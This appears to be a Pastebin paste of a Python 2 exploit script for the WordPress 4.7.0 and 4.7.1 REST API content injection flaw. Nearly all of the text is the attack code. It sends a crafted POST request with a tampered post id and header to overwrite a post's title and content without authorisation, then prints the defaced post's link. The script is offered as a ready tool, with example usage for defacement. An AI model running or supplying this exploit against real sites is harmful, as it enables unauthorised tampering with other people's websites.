API tools faq
paste
_c0mrad

[Expl] WPContInjection.py

_c0mrad
Feb 2nd, 2017
189
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.83 KB | None | 0 0
raw download clone embed print report
  1. """
  2. Wordpress Content Injection Exploit | 4.7.0 & 4.7.1
  3. Usage: wp-content-injection.py --url http://127.0.0.1/wordpress/index.php/wp-json/wp/v2/posts/6 --title "rekt" --content "rip"
  4. Options:
  5. -h, --help show this help message and exit
  6. -u URL, --url=URL Specify the URL
  7. -t TITLE, --title=TITLE Specify the Page Title
  8. -c CONTENT, --content=CONTENT Specify the Page Content
  9. """
  10. # Exploit Title: WP Content Injection Exploit
  11. # Date: 02-02-2017
  12. # Author: GasGeverij
  13. # Version: Wordpress 4.7.0 & 4.7.1
  14. # by: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
  15. import json
  16. import requests
  17. import optparse
  18. import sys
  19. from urlparse import urlparse
  20. import time
  21. script = sys.argv[0]
  22. def getPid(url):
  23.     l = url.split('/')
  24.     getpid = l[l.index('posts') + 1]
  25.     return getpid
  26.  
  27. def getDomain(url):
  28.     parsed_uri = urlparse(url)
  29.     domain = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri)
  30.     return domain
  31.  
  32. def banner():
  33.     return """
  34. ********************************************************
  35. * _    _______      ______ _____ _____ _____    _____  *
  36. *| |  | | ___ \    | ___ \ _  /  ___|_   _|  |_   _| *
  37. *| |  | | |_/ /_____| |_/ / | | \ `--.  | |______| |   *
  38. *| |/\| |  __/______|  __/| | | |`--. \ | |______| |   *
  39. *\ /\ / |         | |   \ \_/ /\__/ / | |     _| |_  *
  40. * \/  \/\_|         \_|    \___/\____/  \_/     \___/  *
  41. *                                                      *
  42. ********************************************************
  43. Cringe.
  44. """
  45.  
  46. def main():
  47.     parser = optparse.OptionParser("Usage: "+script+" -u <URL> --title \"<PAGE_TITLE>\" --content \"<PAGE_CONTENT>\"")
  48.     parser.add_option("-u", "--url", dest="URL", type="string", help="Specify the URL")
  49.     parser.add_option("-t", "--title", dest="TITLE", type="string", help="Specify the Page Title")
  50.     parser.add_option("-c", "--content", dest="CONTENT", type="string", help="Specify the Page Content")
  51.     (options, args) = parser.parse_args()
  52.     url     = options.URL
  53.     title   = options.TITLE
  54.     content = options.CONTENT
  55.     data = {"id" : ""+str(getPid(url))+"textappendshere", "title" : ""+title+"", "content" : ""+content+""}
  56.     headers = {'Content-Type': "application/json; charset=xxxe", 'Accept': "application/json"}
  57.     res = requests.post(url, data=json.dumps(data), headers=headers)
  58.     resp = res.status_code
  59.     print banner()
  60.     print "Status Code: "+str(resp)
  61.     print time.sleep(2)
  62.     if str(resp) == "200":
  63.         print "Yeyeye!"
  64.         print "[+] Exploiting .. "
  65.         print "[+] check the post.."
  66.         print "[+] "+getDomain(url)+"?p="+getPid(url)
  67.     else:
  68.         print "May not be vulnerable?"
  69. if __name__ == '__main__':
  70.     try:
  71.         main()
  72.     except KeyboardInterrupt:
  73.         print "[-] Abort. User stopped the script."
  74.         sys.exit(0)
  75.     except:
  76.         pass
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!